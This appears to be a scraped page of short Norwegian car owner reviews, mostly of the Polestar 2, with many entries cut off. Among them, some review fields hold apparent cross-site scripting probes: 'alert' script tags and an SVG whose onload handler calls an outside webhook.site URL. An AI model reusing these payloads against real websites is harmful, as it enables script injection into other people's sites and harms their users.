Polestar 2 (2024)
Bra rekkevidde.
Polestar 2 (2024)
Mye bra på denne bilen, er totalt sett godt fornøyd. Gode og sportslige kjøreegenskaper, veldig bra på vinterføre, OK hengervekt (1500 kg), gode vindusviskere, utrolig gode lys. Går som ei kule.
Polestar 2 (2023)
Veldig fornøyd alt i alt. På plussiden er kjøreegenskapene og generelt god kvalitetsfølelse. Frydenbø har vært veldig gode å forholde seg til, både med småfeil og vanlig service. Likevel,
Polestar 2 (2023)
Har hatt denne bilen i 1,5 år uten noen problemer. Den er god å kjøre og kvaliteten føles bra. Holder seg godt i pris.
Polestar 2 (2023)
Jeg har eid litt over 40 biler, mange fra premium merker og kjørt ca 2,5 millioner kilometer gjennom årene. Dette er den desidert beste bil jeg hatt.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Polestar 2 (2022)
Veldig godt fornøyd med bilen. Bortsett fra noe trøbbel med startbatteriet har bilen gått som en kule. Lettkjørt trygg bil med premium kjøreegenskaper. Super service hos Kverneland i Stavanger. K
Polestar 2 (2022)
Ekstremt godt fornøyd med bilen nydelig bil og kjøre ikke veldig høyt forbruk god plass for størrelsen
Polestar 2 (2022)
Sportslig preg og lite tull. Plass til barneseter, kjerring og barnevogn.
Polestar 2 (2022)
En fantastisk bil. Beste bilen jeg har hatt. Opplever at Frydenbø Bil er virkelig god på service. Derfor blir neste bil av samme merke.
Polestar 2 (2022)
Praktisk og god bil, men kvaliteten er godt under middels. Mange små problemer som skaper mye irritasjon. Rekkevidde/forbruk er så langt fra oppgitt som man kan komme. Ventetid på verksted er laaaa
Polestar 2 (2022)
Elsker alt ned denne bilen
Polestar 2 (2022)
Jeg får ikke lov av kona å bytte bil.... det sier vel det meste :)
Polestar 2 (2022)
Gjennomtenkt, sikker, pålitelig, tøft design, bra infotainment, hengerfeste, rask og morsom å kjøre.
Polestar 2 (2022)
Kanonbra bil
Polestar 2 (2022)
Beste bilen jeg noen gang har hatt. Den er stiv og sportslig å kjøre. Godt firehjulsdrift, mer enn nok kraft og akselerasjon. Den ser også tøff ut og føles som en bil, med et dashboard som man er
Polestar 2 (2022)
min opplevelse er subjektiv. har sett noen som har samme opplevelse som meg, og flere som har vært kjempe fornøyde med bilen. hvis rekkevidde ikke er et problem, ratt/sete posisjon er komfortabel f
Polestar 2 (2022)
God kjørefølelse, men litt stumpete med 20" felger!
Polestar 2 (2022)
Bra bil, men elendig kundeoppfølging fra Polestar. Polestar driter i deg det sekundet du forlater «utleveringssenteret». Aldri igjen!!!!!
Polestar 2 (2022)
Gir langt bedre drivstoff forbruk når regenerering er avslått
Polestar 2 (2022)
Veldig godt fornøyd med bilen så langt, drøm å kjøre og godt skrudd sammen, Bør bestilles med Pilot og Plusspakke. Har i tillegg ventilerte skinnseter, virkelig å anbefale. Lysene på bilen er
Polestar 2 (2022)
Design, kjøreegenskaper, fantastisk 4
Polestar 2 (2022)
En fantastisk god bil å kjøre. Oppleves som solid og driftssikker. Dessuten har den et lekkert design
Polestar 2 (2022)
Utrolig mye bil for pengene. Artigste kjøpet jeg har gjort på mange år
Polestar 2 (2022)
Det er en "premium car" på enhver måte. Nydelige design-detaljer. Bilens lys-system er noe helt for seg selv, fantastisk. Særlig nærlysene, som følger rattbevegelsene, og fjernlyset som blender
Polestar 2 (2021)
Fantastisk fin bil. Skal beholde den i mange år til og kjøpe ny Polestar etterhvert. Kanskje en Polestar 7?
Polestar 2 (2021)
God å kjøre, fantastiske nattlys. Noen utfordringer med feil ift. ryggelys og baklys som har hatt feil.
Polestar 2 (2021)
En herlig bil!
Polestar 2 (2021)
Strålende bil med litt før høyt forbruk. Som veldig sjelden er et problem
Polestar 2 (2021)
Fantastisk bil med enorm kjøreglede!
Polestar 2 (2021)
Skikkelig kjøremaskin, god å kjøre og helt stilt Har kjørt mange typer biler, men denne tar kaka! Stabil på vinterføre, tar seg enkelt frem på vanskelig snøføre! Ekstrem god radio, ramler a
Polestar 2 (2021)
Etter å ha rullet 55" over 2 år, ingen problemer bare glede
Polestar 2 (2021)
Lykkepille med 0 feil. Opplevd byggekvalitet og kjørefølelse langt over Tesla, Ford Mustang og andre konkurrenter.
Polestar 2 (2021)
Kjørt over 50000 på under to år. Driftsikker, solid, lekker, sportslig bil. Ingen store problemer. Krefter i massevis, fantastisk vinterbil. Forbruk som forventet med tung bil, mye krefter og god o
Polestar 2 (2021)
God kombinasjon av komfor og sportslighet. Gjennomsnittlig plass til bagasje. Beste bilen jeg har hatt
Polestar 2 (2021)
Erfarte hendelse hvor motor stoppet under kjøring, og all drivkraft forsvant helt plutselig. Bilen lot seg rikke eller frikoble etter stans, og bergingsbil måtte tilkalles. Dette skjedde i lav hasti
Polestar 2 (2021)
Litt for høyt forbruk. Litt dårlig sikt bakover ved rygging. Savner varmepumpe. Til tider vanskelig å få kontakt med bilen via appen på telefon. Klarer ikke å erstatte nøkkel med telefon. Elle
Polestar 2 (2021)
Totalt sett er dette den beste bilen jeg har hatt. At den oppdateres jevnlig er fantastisk. Da kommer det ny funksjonalitet og bedre batteristyring. Bilen er gøy å kjøre, jeg smiler hver gang jeg e
Polestar 2 (2021)
Hadde vært meget fornøyd, dersom bilen hadde hatt en moderne app med nyttige funksjoner.
Polestar 2 (2021)
Ikke noen bil for en på over 180 cm som liker førerkomfort og ønsker at alt skal fungere og være intuitivt. Beklager Geely/Volvo.
Polestar 2 (2021)
Super bil med Premium utstyr og ytelser! Mye bil for pengene
Polestar 2 (2021)
Beste bilen jeg har hatt!
Polestar 2 (2021)
Fantastisk bil
Polestar 2 (2021)
Meget bra bil. Litt mer praktiske ting som koppholdere , rom etc. til briller og småting kunne vært bedre. I det store og det hele super bil.
Polestar 2 (2021)
Veldig godt fornøyd med bilen og service. Blir ikke å bytte bil på lenge.
Polestar 2 (2021)
Bruker ca 1,85 kw pr mil på sommer og langkjøring. Noe mer på vinter. Minst fornøyd med appstyringen. Overraskende simpel i forhold til Volvo app som vi har hatt på flere biler siden 2013. Dette
Polestar 2 (2021)
Veldig fornøyd med de første 7000 km. Fantastisk kjøremaskin. Eneste som er et irritasjonsmoment er koppholderplassering.
Polestar 2 (2021)
Polestar 2 (2021)
Super bil med grei plass til det daglige, den er morro å kjøre og den gjør meg glad barre ved å sette meg inn i den
Polestar 2 (2021)
Fantastisk bil som gir en utrolig kjøreglede. Føles som en blanding av en amerikansk muskelbil og en tysk performance. Meget gode lys.
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km